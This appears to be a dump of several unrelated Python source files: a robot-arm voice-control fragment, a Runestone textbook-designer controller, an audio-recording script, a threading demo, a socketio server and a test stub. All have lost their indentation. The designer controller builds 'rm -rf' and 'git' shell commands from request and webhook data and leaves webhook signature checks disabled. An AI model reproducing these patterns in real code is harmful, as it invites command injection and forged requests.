bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Grip Open
if word == "open":
print ("Grip Open is working!")
datapack = 0x02,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Shoulder Down
if word == "shoulder down":
print ("Shoulder Down is working!")
datapack = 0x80,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Shoulder Up
if word == "shoulder up":
print ("Shoulder Up is working!")
datapack = 0x40,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Left
if word == "left":
print ("Left is working!")
datapack = 0x00,10,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 seconds whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Right
if word == "right":
print ("Right is working!")
datapack = 0x00,01,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 seconds whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Light On
if word == "light on":
datapack = 0x00,0,1
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(5) # waits for 5 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Light Off
if word == "light off":
datapack = 0x00,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#else condition
else:
print(".............................")
print(".............................")
print("I only follow valid commands!")
print(".............................")
print(".............................")
should_restart = True
except LookupError:
print(".............................................................")
print(".............................................................")
print("Couldn't understand what you said! Please say something again")
print(".............................................................")
print(".............................................................")
should_restart = True
|
designer.py
|
# -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
import random, string
import datetime
import logging
from threading import Thread
import requests, json, time, re, importlib, os, hashlib, hmac
logger = logging.getLogger(settings.logger)
logger.setLevel(settings.log_level)
admin_logger(logger)
#########################################################################
## This is a samples controller
## - index is the default action of any application
## - user is required for authentication and authorization
## - download is for downloading files uploaded in the db (does streaming)
## - call exposes all registered services (none by default)
#########################################################################
@auth.requires_login()
def index():
basicvalues = {}
if settings.academy_mode:
basicvalues["message"] = T("Course and Textbook Designer")
basicvalues["descr"] = T(
"""This page allows you to select a book for your own class. You will have access to all student activities in your course.
To begin, enter a project name below."""
)
return basicvalues
def logout_github():
session.auth.user.__dict__.pop("github_oauth_token", None)
session.auth.user.__dict__.pop("github_user", None)
if request.args(0) == "revoke":
redirect("https://github.com/settings/applications")
redirect(URL("designer", "book"))
def update_local_files(path, clone_url, commit_id, oldbookname=None):
do_async = True ###TODO turn to true for production
def update_async(path, clone_url, commit_id, oldbookname):
if (
oldbookname
): # try moving from oldbookname to the last part of path, but if that does not work remove oldbookname
os.system(
"cd "
+ "/".join(path.split("/")[:-1])
+ f" && (mv {oldbookname} {path.split('/')[-1]} || rm -rf {oldbookname} )"
)
def reset_local(
path, clone_url, commit_id
): # if anything goes wrong this function is called. it deletes everything and re clones it
os.system("rm -rf " + path)
os.system("mkdir " + path)
os.system(
"cd "
+ path
+ " && cd .. && git clone "
+ clone_url
+ " "
+ path.split("/")[-1]
)
if commit_id:
os.system(
"cd " + path + " && git fetch && git reset --hard " + commit_id
)
os.system("mkdir -p " + "/".join(path.split("/")[:-1]))
try:
x = os.system(
"cd "
+ path
+ " && git symbolic-ref --short refs/remotes/origin/HEAD 1> /dev/null 2> /dev/null"
)
if (
x != 0
or os.system(
"cd "
+ path
+ " && git fetch 1> /dev/null 2> /dev/null && git reset --hard "
+ commit_id
)
!= 0
):
reset_local(path, clone_url, commit_id)
except:
reset_local(path, clone_url, commit_id)
os.system(
f"cd {path} && runestone build 1> /dev/null 2> /dev/null && runestone deploy 1> /dev/null 2> /dev/null"
)
directory_name = None
try:
directory_name = os.listdir(path + "/published")[0]
except:
logger.error(f"error setting directory name for {path}")
new_book_path = ("/").join(path.split("/")[4:6])
if directory_name:
if path.split("/")[3] == "drafts":
db.textbooks.update_or_insert(
db.textbooks.path == new_book_path, drafts_directory=directory_name
)
else:
db.textbooks.update_or_insert(
db.textbooks.path == new_book_path,
published_directory=directory_name,
)
if do_async:
Thread(
target=update_async, args=(path, clone_url, commit_id, oldbookname)
).start()
else:
update_async(path, clone_url, commit_id, oldbookname)
def update_books_webhook():
verify_webhook = False ### TODO turn to true in production
post_data_json = request.vars
textbook = db(
(db.textbooks.github_account == post_data_json["repository"]["owner"]["login"])
& (db.textbooks.github_repo_name == post_data_json["repository"]["name"])
).select()[0]
computed_hash = (
"sha256="
+ hmac.new(
textbook.webhook_code.encode("utf-8"), request.body.read(), hashlib.sha256
).hexdigest()
)
logger.debug(request.env["HTTP_X_HUB_SIGNATURE_256"] + " " + computed_hash)
if verify_webhook and not request.env["HTTP_X_HUB_SIGNATURE_256"] == computed_hash:
raise HTTP(503, "wrong hub signature!")
if textbook and (
"ref" not in post_data_json.keys()
or post_data_json["repository"]["default_branch"]
== post_data_json["ref"].split("/")[-1]
):
local_path = "applications/runestone/custom_books/drafts/" + textbook.path
if "commits" in post_data_json.keys(): # we were sent a commit
update_local_files(
local_path,
post_data_json["repository"]["clone_url"],
post_data_json["head_commit"]["id"],
)
db.textbooks.update_or_insert(
db.textbooks.path == textbook.path,
draft_commit=post_data_json["head_commit"]["id"],
)
else: # we were not sent a commit (this happens on the inital fork, in this case we will just clone the repo)
update_local_files(
local_path, post_data_json["repository"]["clone_url"], None
)
raise HTTP(200, "updated successfully")
raise HTTP(500, "internal server error")
def verify_github_login(desiredUser, retry=True):
if "github_oauth_token" in session.auth.user.__dict__.keys():
user = requests.get(
"https://api.github.com/user",
headers={
"Authorization": "token "
+ session.auth.user.__dict__["github_oauth_token"]
},
)
if user.status_code != 200 and retry:
location = (
"https://github.com/login/oauth/authorize?scope=repo,delete_repo&client_id="
+ session.auth.user.__dict__["github_client_id"]
)
logger.debug(
f"github token for {session.auth.user.username} expired, redirecting to refresh token"
)
session.auth.user.__dict__.pop("github_oauth_token", None)
session.auth.user.__dict__.pop("github_user", None)
raise HTTP(
303,
"You are being redirected to refresh your github token",
Location=location,
)
elif user.status_code != 200 and (not retry):
session.auth.user.__dict__.pop("github_oauth_token", None)
session.auth.user.__dict__.pop("github_user", None)
return False
else:
if user.json()["login"] == desiredUser:
session.auth.user.__dict__["github_user"] = user.json()["login"]
return True
else:
session.auth.user.__dict__.pop("github_user", None)
session.auth.user.__dict__.pop("github_oauth_token", None)
return False
else:
session.auth.user.__dict__.pop("github_user", None)
return False
def github_book_repo(
account, repo, oldb, renameval=None, delete=False, reset=False, create=False
):
ret_dict = {"changed": False, "failed": True}
auth = (
session.auth.user.__dict__["github_user"],
session.auth.user.__dict__["github_oauth_token"],
)
headers = {"Accept": "application/vnd.github.v3+json"}
base_url = "https://api.github.com/"
## sanity check API is working on githubs side and we have the correct credentials
sanity_check = requests.get(
base_url + "users/" + account + "/repos", auth=auth, headers=headers
)
if not sanity_check.status_code == 200:
ret_dict["msg"] = "unable to even connect to github API"
return ret_dict
## checking that the repo in question is either found or not found
check_existence = requests.get(
base_url + "repos/" + account + "/" + repo, auth=auth, headers=headers
)
if not (check_existence.status_code == 404 or check_existence.status_code == 200):
ret_dict[
"msg"
] = "repository gave neither a 404 or a 200, some bad error occured"
return ret_dict
if delete or reset:
# cant delete if nothing is there
if check_existence.status_code == 404:
ret_dict["msg"] = "nothing to delete"
return ret_dict
remove = requests.delete(
base_url + "repos/" + account + "/" + repo, auth=auth, headers=headers
)
if not remove.status_code == 204:
ret_dict["msg"] = "error with delete API request"
return ret_dict
elif delete:
return {"changed": True, "failed": False}
else:
ret_dict["changed"] = True
fork_existence = requests.get(
base_url + "repos/" + account + "/" + oldb, auth=auth, headers=headers
)
# If we are trying to create a repository that already exists, fail
# If we are going to fork into a repository that already exists as we create, fail
if (
(check_existence.status_code != 404 or fork_existence.status_code != 404)
and create
) or (fork_existence.status_code != 404 and reset):
ret_dict["msg"] = "trying to create a repo that already exists"
return ret_dict
if create or reset:
fork_url = base_url + "repos/RunestoneInteractive/" + oldb + "/forks"
requests.post(fork_url, auth=auth, headers=headers)
retries = 30
# wait for the fork to finish
while (
requests.get(
base_url + "repos/" + account + "/" + oldb, auth=auth, headers=headers
).status_code
!= 200
and retries > 0
):
time.sleep(1)
retries -= 1
if retries == 0:
ret_dict["msg"] = "timed out waiting for repo to be forked"
return ret_dict
hook_url = base_url + "repos/" + account + "/" + oldb + "/hooks"
ret_dict["webhook_code"] = "".join(
random.choice(string.ascii_lowercase + string.digits) for i in range(20)
)
hook_data = {
"config": {
"url": "https://runestone.academy/runestone/designer/update_books_webhook",
"content_type": "json",
"secret": ret_dict["webhook_code"],
}
}
requests.post(hook_url, auth=auth, headers=headers, data=json.dumps(hook_data))
requests.patch(
base_url + "repos/" + account + "/" + oldb,
auth=auth,
headers=headers,
data=json.dumps({"name": repo}),
)
ret_dict["changed"] = True
if renameval and not (check_existence.status_code == 200 or create):
ret_dict["msg"] = "trying to edit a repo that does not exist"
return ret_dict
if renameval:
requests.patch(
base_url + "repos/" + account + "/" + repo,
auth=auth,
headers=headers,
data=json.dumps({"name": renameval}),
)
ret_dict["changed"] = True
ret_dict["failed"] = False
return ret_dict
@auth.requires_login()
def book_edit():
# Verify post data is of the correct format
for id in [
"oldBookIdentifier",
"newBookIdentifier",
"baseBook",
"newGithubRepo",
"githubUser",
"oldGithubRepo",
]:
if request.vars[id] == "" or " " in request.vars[id] or "/" in request.vars[id]:
session.flash = (
f"Failed to edit book: {id} cannot be emtpy, have spaces or /"
)
redirect(URL("designer", "book"))
elif not re.match(
"^([\x30-\x39]|[\x41-\x5A]|[\x61-\x7A]|[_-])*$", request.vars[id]
):
session.flash = f"Failed to edit book: {id} must be alphanumeric or _ -"
redirect(URL("designer", "book"))
# Create, edit, delete or publish all can work with a notion of a previous book and a new book
old_path = session.auth.user.username + "/" + request.vars.oldBookIdentifier
new_path = session.auth.user.username + "/" + request.vars.newBookIdentifier
existing_old_book = db(db.textbooks.path == old_path).select().first()
existing_new_book = db(db.textbooks.path == new_path).select().first()
new_book_is_same = existing_old_book == existing_new_book
# Ensure the github user that is sent in the request actually owns this repository
if not verify_github_login(request.vars.githubUser, False):
session.flash = f"Failed to edit book: Token expired log in again"
redirect(URL("designer", "book"))
if request.vars.changeType == "create":
if existing_new_book:
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
changed_github = github_book_repo(
request.vars.githubUser,
request.vars.newGithubRepo,
request.vars.baseBook,
create=True,
)
if changed_github["failed"]:
session.flash = f"Failed to create book: {changed_github['msg']}"
logger.error(f"Failed to create book: {changed_github['msg']}")
redirect(URL("designer", "book"))
else:
session.flash = f"Created book: {request.vars['oldBookIdentifier']}"
db.textbooks.update_or_insert(
db.textbooks.path == new_path,
path=new_path,
github_account=request.vars.githubUser,
runestone_account=session.auth.user.username,
github_repo_name=request.vars.newGithubRepo,
regname=request.vars.newBookIdentifier,
base_book=request.vars.baseBook,
published="false",
webhook_code=changed_github["webhook_code"],
)
elif request.vars.changeType == "delete":
if (
(not existing_old_book)
or (not request.vars.githubUser == existing_old_book.github_account)
or (not session.auth.user.username == existing_old_book.runestone_account)
):
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
changed_github = github_book_repo(
request.vars.githubUser,
request.vars.oldGithubRepo,
request.vars.baseBook,
delete=True,
)
if changed_github["failed"]:
session.flash = f"Failed to delete book: {changed_github['msg']}"
logger.error(f"Failed to delete book: {changed_github['msg']}")
redirect(URL("designer", "book"))
else:
os.system(
"rm -rf applications/runestone/custom_books/drafts/{}/{}".format(
existing_old_book.runestone_account, existing_old_book.regname
)
)
os.system(
"rm -rf applications/runestone/custom_books/published/{}/{}".format(
existing_old_book.runestone_account, existing_old_book.regname
)
)
courses = db(db.courses.base_course == old_path).select()
# all courses that are using the custom textbook now use the book that the custom textbook was originally cloned from
for course in courses:
db.courses.update_or_insert(
db.courses.course_name == course.course_name,
base_course=existing_old_book.base_book,
)
db(db.textbooks.path == old_path).delete()
session.flash = f"Deleted book: {request.vars['oldBookIdentifier']}"
elif request.vars.changeType == "edit":
if (
(not existing_old_book)
or (existing_new_book and not new_book_is_same)
or (not request.vars.githubUser == existing_old_book.github_account)
or (not session.auth.user.username == existing_old_book.runestone_account)
):
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
if request.vars.newGithubRepo != existing_old_book.github_repo_name:
changed_github = github_book_repo(
request.vars.githubUser,
request.vars.oldGithubRepo,
request.vars.baseBook,
renameval=request.vars.newGithubRepo,
)
if changed_github["failed"]:
session.flash = f"Failed to edit book: {changed_github['msg']}"
logger.error(f"Failed to edit book: {changed_github['msg']}")
redirect(URL("designer", "book"))
session.flash = f"Edited book: {request.vars['newBookIdentifier']}"
if request.vars.oldBookIdentifier != request.vars.newBookIdentifer:
db.textbooks.update_or_insert(
db.textbooks.path == old_path,
path=new_path,
github_account=request.vars.githubUser,
runestone_account=session.auth.user.username,
github_repo_name=request.vars.newGithubRepo,
regname=request.vars.newBookIdentifier,
)
update_local_files(
"applications/runestone/custom_books/drafts/{}/{}".format(
existing_old_book.runestone_account, request.vars.newBookIdentifier
),
"https://github.com/{}/{}.git".format(
existing_old_book.github_account, request.vars.newGithubRepo
),
existing_old_book.draft_commit,
oldbookname=request.vars.oldBookIdentifier,
)
if existing_old_book.published:
update_local_files(
"applications/runestone/custom_books/published/{}/{}".format(
existing_old_book.runestone_account,
request.vars.newBookIdentifier,
),
"https://github.com/{}/{}.git".format(
existing_old_book.github_account, request.vars.newGithubRepo
),
existing_old_book.draft_commit,
oldbookname=request.vars.oldBookIdentifier,
)
courses = db(db.courses.base_course == old_path).select()
# all courses that are using the custom textbook now use the new name
for course in courses:
db.courses.update_or_insert(
db.courses.course_name == course.course_name, base_course=new_path
)
elif request.vars.changeType == "publish":
if (
(not existing_old_book)
or (not request.vars.githubUser == existing_old_book.github_account)
or (not session.auth.user.username == existing_old_book.runestone_account)
):
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
db.textbooks.update_or_insert(
db.textbooks.path == existing_old_book.path,
published="true",
published_commit=existing_old_book.draft_commit,
)
update_local_files(
f"applications/runestone/custom_books/published/{existing_old_book.runestone_account}/{existing_old_book.regname}",
f"https://github.com/{existing_old_book.github_account}/{existing_old_book.github_repo_name}.git",
existing_old_book.draft_commit,
)
session.flash = f"Published book: {request.vars['oldBookIdentifier']}"
else:
session.flash = "invalid parameter for changeType passed to edit_book. This is an internal server error"
redirect(URL("designer", "book"))
### TODO add handling for change_type "reset"
@auth.requires_login()
def callback(): # handles github oauth callback after user grants repository permiission
if "code" in request.vars.keys():
oauth_url = "https://github.com/login/oauth/access_token"
oauth_data = {
"client_id": os.getenv("CLIENT_ID"),
"client_secret": os.getenv("CLIENT_SECRET"),
"code": request.vars.code,
}
oauth_headers = {"Accept": "application/json"}
try:
oauth = requests.post(oauth_url, json=oauth_data, headers=oauth_headers)
if oauth.status_code == 200:
session.auth.user.__dict__["github_oauth_token"] = oauth.json()[
"access_token"
]
user = requests.get(
"https://api.github.com/user",
headers={"Authorization": "token " + oauth.json()["access_token"]},
)
session.auth.user.__dict__["github_user"] = user.json()["login"]
else:
session.flash = f"got {oauth.status_code} from github"
except:
logger.error(
f"Failure connecting to {oauth_url} There is either a problem with your servers connectivity or githubs"
)
redirect(URL("designer", "book"))
def gather_book_info(book_list, username=None):
book_list_result = []
for book in sorted(book_list):
try:
# WARNING: This imports from ``applications.<runestone application name>.books.<book name>``. Since ``runestone/books/<book_name>`` lacks an ``__init__.py``, it will be treated as a `namespace package <https://www.python.org/dev/peps/pep-0420/>`_. Therefore, odd things will happen if there are other modules named ``applications.<runestone application name>.books.<book name>`` in the Python path.
if username:
config = importlib.import_module(
"applications.{}.custom_books.drafts.{}.{}.conf".format(
request.application, username, book
)
)
else:
config = importlib.import_module(
"applications.{}.books.{}.conf".format(request.application, book)
)
except Exception as e:
logger.error("Error in book list: {}".format(e))
continue
book_info = {}
book_info.update(course_description="")
book_info.update(key_words="")
if hasattr(config, "navbar_title"):
book_info["title"] = config.navbar_title
elif hasattr(config, "html_title"):
book_info["title"] = config.html_title
elif hasattr(config, "html_short_title"):
book_info["title"] = config.html_short_title
else:
book_info["title"] = "Runestone Book"
# update course description if found in the book's conf.py
if hasattr(config, "course_description"):
book_info.update(course_description=config.course_description)
# update course key_words if found in book's conf.py
if hasattr(config, "key_words"):
book_info.update(key_words=config.key_words)
if not username: # non-custom book
book_info["url"] = "/{}/books/published/{}/index.html".format(
request.application, book
)
else: # custom book
book_info["url"] = "/{}/books/custom_books/drafts/{}/{}/index.html".format(
request.application, username, book
)
book_info[
"published_url"
] = "/{}/books/custom_books/published/{}/{}/index.html".format(
request.application, username, book
)
db_result = (
db(db.textbooks.path == session.auth.user.username + "/" + book)
.select()
.first()
)
book_info["github_repo_name"] = db_result.github_repo_name
book_info["github_account"] = db_result.github_account
book_info["published"] = db_result.published
book_info["path"] = session.auth.user.username + "/" + book
book_info["regname"] = book
book_list_result.append(book_info)
return book_list_result
@auth.requires_login()
def book():
os.system(
"mkdir -p "
+ "applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
os.system(
"mkdir -p "
+ "applications/{}/custom_books/published/{}".format(
request.application, session.auth.user.username
)
)
github = {}
session.auth.user.__dict__["github_client_id"] = os.getenv("CLIENT_ID")
github["client_id"] = session.auth.user.__dict__["github_client_id"]
if "github_user" in session.auth.user.__dict__.keys():
if not verify_github_login(session.auth.user.__dict__["github_user"]):
session.auth.user.__dict__.pop("github_user", None)
session.auth.user.__dict__.pop("github_oauth_token", None)
github["found"] = False
else:
github["user"] = session.auth.user.__dict__["github_user"]
github["found"] = True
else:
github["found"] = False
book_list = os.listdir("applications/{}/books".format(request.application))
book_list = [book for book in book_list if ".git" not in book]
custom_book_list = os.listdir(
"applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
custom_book_list = [book for book in custom_book_list if ".git" not in book]
book_list_result = gather_book_info(book_list)
custom_book_list_result = gather_book_info(
custom_book_list, session.auth.user.username
)
return dict(
book_list=book_list_result,
custom_book_list=custom_book_list_result,
github=github,
)
@auth.requires_login()
def course():
os.system(
"mkdir -p "
+ "applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
os.system(
"mkdir -p "
+ "applications/{}/custom_books/published/{}".format(
request.application, session.auth.user.username
)
)
basicvalues = {}
if settings.academy_mode:
"""
example action using the internationalization operator T and flash
rendered by views/default/index.html or views/generic.html
"""
# response.flash = "Welcome to CourseWare Manager!"
basicvalues["message"] = T("Build a Custom Course")
basicvalues["descr"] = T(
"""This page allows you to select a book for your own class. You will have access to all student activities in your course.
To begin, enter a project name below."""
)
# return dict(message=T('Welcome to CourseWare Manager'))
custom_book_list = os.listdir(
"applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
custom_book_list = [book for book in custom_book_list if ".git" not in book]
basicvalues["custom_book_list"] = gather_book_info(
custom_book_list, session.auth.user.username
)
return basicvalues
@auth.requires_login()
def course_build():
buildvalues = {}
if settings.academy_mode:
buildvalues["pname"] = request.vars.projectname
buildvalues["pdescr"] = request.vars.projectdescription
existing_course = (
db(db.courses.course_name == request.vars.projectname).select().first()
)
if existing_course:
session.flash = (
f"course name {request.vars.projectname} has already been used"
)
redirect(URL("designer", "course"))
if not request.vars.coursetype:
session.flash = "You must select a base course."
redirect(URL("designer", "course"))
# if make instructor add row to auth_membership
if "instructor" in request.vars:
gid = (
db(db.auth_group.role == "instructor").select(db.auth_group.id).first()
)
db.auth_membership.insert(user_id=auth.user.id, group_id=gid)
base_course = request.vars.coursetype
if request.vars.startdate == "":
request.vars.startdate = datetime.date.today()
else:
date = request.vars.startdate.split("/")
request.vars.startdate = datetime.date(
int(date[2]), int(date[0]), int(date[1])
)
if not request.vars.institution:
institution = "Not Provided"
else:
institution = request.vars.institution
if not request.vars.courselevel:
courselevel = "unknown"
else:
courselevel = request.vars.courselevel
python3 = "true"
if not request.vars.loginreq:
login_required = "false"
else:
login_required = "true"
cid = db.courses.update_or_insert(
course_name=request.vars.projectname,
term_start_date=request.vars.startdate,
institution=institution,
base_course=base_course,
login_required=login_required,
python3=python3,
courselevel=courselevel,
)
if request.vars.invoice:
db.invoice_request.insert(
timestamp=datetime.datetime.now(),
sid=auth.user.username,
email=auth.user.email,
course_name=request.vars.projectname,
)
# enrol the user in their new course
db(db.auth_user.id == auth.user.id).update(course_id=cid)
db.course_instructor.insert(instructor=auth.user.id, course=cid)
auth.user.update(
course_name=request.vars.projectname
) # also updates session info
auth.user.update(course_id=cid)
db.executesql(
"""
INSERT INTO user_courses(user_id, course_id)
SELECT %s, %s
""",
(auth.user.id, cid),
)
session.flash = "Course Created Successfully"
# redirect(
# URL("books", "published", args=[request.vars.projectname, "index.html"])
# )
return dict(coursename=request.vars.projectname, basecourse=base_course)
|
step1_audio_collection.py
|
# -*- coding:utf-8 -*-
import os
import sys
from os.path import dirname, join, abspath
sys.path.insert(0, abspath(join(dirname(__file__), '..')))
folder_path = os.path.dirname(abspath(__file__))
import numpy as np
import pyaudio
from pathlib import Path
import time
import wave
import argparse
import wget
import threading
import random
import json
import librosa
import librosa.display
import matplotlib.pyplot as plt
from utils.microphone import select_microphone_cmd
###########################
# Settings
###########################
with open("../GESTURE_CONFIG.json", "r") as f:
gesture_config = json.load(f)
GESTURE = gesture_config["gesture_list_formal"]
#RECORD_SECONDS = 4
RECORD_SECONDS = 3
FORMAT = pyaudio.paInt16
CHANNELS = gesture_config["channels"]
RATE = gesture_config["samplerate"]
HZ = 25
CHUNK = RATE // HZ
###########################
# Check microphones
# Then read the command line input to select a microphone
###########################
MICROPHONE_INDEX = select_microphone_cmd()
p = pyaudio.PyAudio()
u = 0
###########################
# Sub functions
###########################
def TIMER():
print('2')
time.sleep(1)
print('1')
time.sleep(1)
print('.')
time.sleep(0.5)
print('.')
time.sleep(0.5)
print('.')
time.sleep(0.5)
return
def RECORDER(NAME):
# Start 0.5s after the "2" sign shows up
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK,input_device_index = MICROPHONE_INDEX)
t2 = threading.Thread(target=TIMER, args=())
t2.start()
frames = []
time.sleep(0.5)
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(NAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
# show a spectrogram right away to timely discover any errors
# x, sr = librosa.load(NAME)
# fig, axes = plt.subplots(figsize=(18, 9), ncols = 2)
# librosa.display.waveplot(x, sr=sr, ax = axes[0])
# X = librosa.stft(x)
# Xdb = librosa.amplitude_to_db(abs(X))
# librosa.display.specshow(Xdb, sr=sr, x_axis='time', y_axis='hz', ax = axes[1])
# plt.show()
return
def RecordOnce(r,g, PATH):
global u
NAME = PATH + str(r)+'.wav'
t1 = threading.Thread(target=RECORDER, args=(NAME,))
t1.start()
t1.join()
print('Nice job! Record done\n')
return
def Record(t, g, rept):
global u
print('\n=================')
time.sleep(0.5)
print('Test: ', t, 'of ' + str(len(GESTURE)))
print('Test description: ', GESTURE[g])
print('\n=================')
while True:
key = input('Be careful! Please pay attention to the countdown\nPress "y/1" to start: ')
if (key == 'Y' or key == 'y' or key == 1 or key == "1"):
break
r=1
PATH = folder_path + '/DataStudy1/'+str(GESTURE[g]).replace(" ","_")+'/'+'user'+str(u) + "/"
if not os.path.exists(PATH):
os.makedirs(PATH)
while r<rept+1:
RecordOnce(r,g, PATH)
#just pressing enter will save the file,any other key pressed before enter means redo
if r < rept:
key = input('Press "y/1" to save, or press "n/2" to discard: ').strip()
if (key == 'Y' or key == 'y' or key == 1 or key == "1"):
print('Data has been saved\n')
time.sleep(0.5)
print('round %d is coming: \n'%((r+1)))
r = r + 1
else:
print('Data has been discarded')
time.sleep(0.5)
print('this round will be repeat: \n')
elif r == rept:
key = input('Press "y/1" to save, or press "n/2" to discard: ').strip()
if (key == 'Y' or key == 'y' or key == 1 or key == "1"):
print('\nCongratulations, this test has been completed')
print('================')
time.sleep(0.5)
print('The next test starts right away: \n' )
r = r + 1
else:
print('Data has been discarded')
time.sleep(0.5)
print('this round will be repeat: \n')
time.sleep(1)
return
###########################
# Main function
###########################
def main():
global u
u = input('Please enter your User ID: ')
print('\nHello!','\nYour ID is No.', str(u), "\n")
REPEAT = int(input('Please set the number of repetitions for each gesture: '))
print('Repeat time: ', REPEAT)
gesture_list = list(range(0,len(GESTURE)))
for session in range(1,11):
print('\nsession %s' % session)
random.shuffle(gesture_list)
for t in range(0,len(GESTURE)):
g = gesture_list[t]
Record(t+1, g, REPEAT)
print('\nsession %s finished\n' % session)
print('Congratulations! You have completed all the tests.\nThank you for your participation!\nYou can close the window now')
time.sleep(0.5)
if __name__ == "__main__":
main()
|
demo9.py
|
from queue import Queue
import threading
import time
# q = Queue(4) 4表示最多4个
#
# for x in range(4):
# q.put(x)
#
# for x in range(4):
# print(q.get())
# print(q.qsize())
def set_value(q):
index = 0
while True:
q.put(index)
index += 1
time.sleep(1)
def get_value(q):
while True:
print(q.get())
def main():
q = Queue(4)
t1 = threading.Thread(target=set_value,args=[q])
t2 = threading.Thread(target=get_value,args=[q])
t1.start()
t2.start()
if __name__ == "__main__":
main()
|
SocketServer.py
|
import eventlet
from eventlet import wsgi, websocket
import socketio
from VirtualWebcam import VirtualWebcam
import subprocess as sp
from queue import Queue
from threading import Thread, Lock
import traceback
sio = socketio.Server()
app = socketio.WSGIApp(sio)
message_queue = Queue()
thread = None
lock = Lock()
@sio.event
def connect(sid, environ):
print("-------------------CONNECT ", sid)
try:
global thread
global message_queue
if thread == None:
thread = Thread(target=long_running, args=(message_queue,))
thread.start()
return "OK", 123
except:
traceback.print_exc()
@sio.event
def setting_change(sid, data):
print(data)
if data.get("webcam"):
print("Setting changed", data.get("webcam"))
message_queue.put({"type": "webcam", "payload": data.get("webcam")})
elif data.get("accessibility"):
print("Setting changed", data.get("accessibility"))
message_queue.put(
{"type": "accessibility", "payload": data.get("accessibility")}
)
elif data.get("audio"):
print("Setting changed", data.get("audio"))
message_queue.put({"type": "audio", "payload": data.get("audio")})
else:
pass
# Add the data to Queue
return "OK", 123
@sio.event
def disconnect(sid):
print("disconnect ", sid)
print("ASDASDSD")
def long_running(message_queue):
t = VirtualWebcam(lock)
print("Starting up webcam")
t.start(message_queue)
if __name__ == "__main__":
eventlet.wsgi.server(eventlet.listen(("", 5000)), app)
|
TestE2EScenarios.py
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import logging
from threading import Thread
import time
from mlos.Logger import create_logger
from mlos.Examples.SmartCache import SmartCacheWorkloadGenerator, SmartCache
from mlos.Examples.SmartCache.TelemetryAggregators.WorkingSetSizeEstimator import WorkingSetSizeEstimator
from mlos.Mlos.Infrastructure import CommunicationChannel, SharedConfig
from mlos.Mlos.SDK import mlos_globals, MlosGlobalContext, MlosExperiment, MlosAgent
from mlos.Mlos.SDK.CommonAggregators.Timer import Timer
class TestE2EScenarios:
""" Tests aggregators based on the timer.
"""
@classmethod
def setup_class(cls) -> None:
mlos_globals.init_mlos_global_context()
cls.logger = create_logger('TestE2EScenarios')
cls.logger.level = logging.INFO
cls.mlos_agent = MlosAgent(
logger=cls.logger,
communication_channel=mlos_globals.mlos_global_context.communication_channel,
shared_config=mlos_globals.mlos_global_context.shared_config
)
cls.mlos_agent_thread = Thread(target=cls.mlos_agent.run)
cls.mlos_agent_thread.start()
mlos_globals.mlos_global_context.start_clock()
cls.mlos_agent.add_allowed_component_type(SmartCache)
cls.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
@classmethod
def teardown_class(cls) -> None:
cls.mlos_agent.stop_all()
mlos_globals.mlos_global_context.stop_clock()
def test_timer(self):
""" Tests if the timer works with required precision.
:return:
"""
timeout_ms = 100
